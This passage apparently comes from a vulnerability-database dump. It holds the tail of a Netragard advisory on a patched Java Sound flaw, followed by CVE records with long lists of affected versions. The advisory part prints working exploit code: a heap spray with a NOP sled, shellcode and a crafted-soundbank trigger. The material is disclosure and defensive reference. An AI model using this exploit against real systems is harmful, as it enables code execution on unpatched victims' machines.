0x48484848 0x20202020 0x20202020 0x20202020 \n// 0x2558212e: 0x20202020 0x20202020 0x20202020 0x20202020 \n// 0x2558213e: 0x20202020 0x20202020 \n \n// Set the call address \n// 0x188fd81b \n<Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource+108>: \ncall *0x2a8(%eax) \n \nbuffer.append('\\u2122'); \nbuffer.append('\\u2558'); \n \n// 0x2a8 is 680 in decimal, once again we need filler for making \nthis a usable address location. \nfor (int i = 1; i < (680/2)-1; i++) \n{ \nbuffer.append('\\u4848'); \n} \n \n// where do we wanna go? 0x25582525 is right in the middle of the \nfollowing nop sled \n// (gdb) x/5x 0x25582525 \n// 0x25582525: 0x90909090 0x90909090 0x90909090 0x90909090 \n// 0x25582535: 0x90909090 \n \nbuffer.append('\\u2525'); \nbuffer.append('\\u2558'); \n \n// We are gonna place the shellcode after this so simply fill \nin remaining space with nops! 
\nfor (int i = 1; i < (1024*1024-12)/2-shellcode.length(); i++) \n{ \nbuffer.append('\\u9090'); \n} \n \n// Append the shellcode \nbuffer.append(shellcode); \n \n// Run the garbage collector \nRuntime.getRuntime().gc(); \n \n// Fill the heap with copies of the string \ntry \n{ \nfor (int i=0; i<mb; i++) \n{ \nmem[i] = buffer.toString(); \n} \n} \ncatch (OutOfMemoryError err) \n{ \n// do nothing \n} \n \n// Trigger the stack overflow. \nsynth.loadAllInstruments(MidiSystem.getSoundbank(new URL(fName))); \n} \ncatch(Exception e) \n{ \nSystem.out.println(e); \n} \n} \npublic void paint(Graphics g) \n{ \ng.drawString(\"Hello pwned!\", 50, 25); \n} \npublic static String repeat(char c,int i) \n{ \nString tst = \"\"; \nfor(int j = 0; j < i; j++) \n{ \ntst = tst+c; \n} \nreturn tst; \n} \n} \n \n[Fix] \n----------------------------------------------------------------------- \nhttp://support.apple.com/kb/HT3969 \nhttp://java.sun.com/javase/6/webnotes/ReleaseNotes.html \nhttp://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1 \n \n[Vendor Status] \n----------------------------------------------------------------------- \nVendor Notified and issue has been Patched \n \n[Vendor Comments] \n----------------------------------------------------------------------- \nJava for Mac OS X 10.6 Update 1 is now available and addresses the \nfollowing: \n \nCVE-ID: CVE-2009-3869, CVE-2009-3871, CVE-2009-3875, CVE-2009-3874, \nCVE-2009-3728, CVE-2009-3872, CVE-2009-3868, CVE-2009-3867, \nCVE-2009-3884, \nCVE-2009-3873, CVE-2009-3877, CVE-2009-3865, CVE-2009-3866 \n \nAvailable for: Mac OS X v10.6.2 and later, Mac OS X Server v10.6.2 and \nlater \n \nImpact: Multiple vulnerabilities in Java 1.6.0_15 \n \nDescription: Multiple vulnerabilities exist in Java 1.6.0_15, the most \nserious of which may allow an untrusted Java applet to obtain elevated \nprivileges. 
\n \nVisiting a web page containing a maliciously crafted untrusted Java \napplet \nmay lead to arbitrary code execution with the privileges of the \ncurrent user. \nThese issues are addressed by updating to Java version 1.6.0_17. Further \ninformation is available via the Sun Java website. Credit to Kevin \nFinisterre \nof Netragard for reporting CVE-2009-3867 to Apple. \n \n[Why] \n----------------------------------------------------------------------- \nWe are often asked \"why do you do what you do?\". The answer is that \nour research helps to educate people about risks that affect them that \nmight otherwise go unnoticed. Often times our research ends up plugging \nholes that might end up resulting in a successful compromise if left \nunchecked. Want proof? Take a look at some of the comments taken \nfrom the article below: \n \nhttp://www.theregister.co.uk/2009/12/04/mac_windows_java_attack/ \n \nComment 1: Ben Lambert writes \n----------------------------- \n\"Oh that's just wonderful. So I can't update my \nmachines to a newer Java version because it breaks my critical app.. \n..or i can get exploited. I love my job.\" \n \nComment 2: windywoo wrote \n------------------------- \n\"This article was the first I heard about the patch so I checked \nSoftware Update and there it was.\" \n \n \n[Disclaimer] \n----------------------http://www.netragard.com------------------------- \nNetragard, L.L.C. assumes no liability for the use of the information \nprovided in this advisory. This advisory was released in an effort to \nhelp the I.T. community protect themselves against a potentially \ndangerous security hole. This advisory is not an attempt to solicit \nbusiness. 
\n \n<a href=\"http://www.netragard.com> \nhttp://www.netragard.com \n</a> \n \n \n \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84499/NETRAGARD-20091219.txt"}], "cve": [{"lastseen": "2021-02-02T05:40:06", "description": "Stack-based buffer overflow in the setDiffICM function in the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via a crafted argument, aka Bug Id 6872357.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3869", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3869"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", 
"cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", 
"cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3869", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Integer overflow in the JPEGImageReader implementation in the ImageI/O component in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via large subsample dimensions in a JPEG file that triggers a heap-based buffer overflow, aka Bug Id 6874643.\nPer: http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1\r\n\r\nResolution\r\n\r\nCR 6854303, 6862970, 6872357, 6872358, and 6862969 are addressed in the following releases:\r\n\r\nJava SE for Windows, Solaris, and Linux:\r\n\r\n * JDK and JRE 6 Update 17 or later\r\n * JDK and JRE 5.0 Update 22 or later\r\n\r\nJava SE for Solaris:\r\n\r\n * SDK and JRE 1.4.2_24 or later\r\n\r\nJava SE for Windows:\r\n\r\n * SDK and JRE 1.3.1_27 or later\r\n\r\nJava SE for Business for Windows, Solaris and Linux:\r\n\r\n * JDK and JRE 6 Update 17 or later\r\n * JDK and JRE 5.0 Update 22 or later\r\n * SDK and JRE 1.4.2_24 or later\r\n\r\nThe issues described in CR 6874643 and 6862968 are addressed in the following releases:\r\n\r\nJava SE for Windows, Solaris, and Linux:\r\n\r\n * JDK and JRE 6 Update 17 or later\r\n * JDK and JRE 5.0 Update 22 or later\r\n\r\nJava SE for Solaris:\r\n\r\n * SDK and JRE 1.4.2_24 or later\r\n\r\nJava SE for Business for Windows, Solaris and Linux:\r\n\r\n * 
